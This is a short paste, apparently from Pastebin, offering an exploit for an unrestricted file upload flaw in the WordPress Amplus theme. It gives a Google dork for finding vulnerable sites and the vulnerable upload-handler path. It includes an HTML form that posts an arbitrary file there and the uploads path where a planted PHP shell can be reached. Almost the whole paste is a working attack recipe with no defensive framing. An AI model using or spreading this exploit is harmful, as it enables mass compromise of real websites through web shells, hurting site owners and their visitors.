Googleinurl

EXPLOIT Wordpress Amplus Theme - CSRF Vulnerability

Nov 18th, 2013
298
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #Vulnerabillity : CSRF
  2.  
  3. #Dork :
  4.  
  5. inurl:wp-content/themes/amplus
  6.  
  7.  
  8. CSRF File Upload Vulnerability
  9.  
  10. Exploit & POC :
  11.  
  12. http://site-target/wp-content/themes/amplus/functions/upload-handler.php
  13.  
  14. Script :
  15.  
  16. <form enctype="multipart/form-data"
  17. action="http://127.0.0.1/wp-content/themes/amplus/functions/upload-handler.php" method="post">
  18. Your File: <input name="uploadfile" type="file" /><br />
  19. <input type="submit" value="upload" />
  20. </form>
  21.  
  22.  
  23. File Access :
  24.  
  25. http://site-target/uploads/[years]/[month]/your_shell.php
  26.  
  27. Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php
RAW Paste Data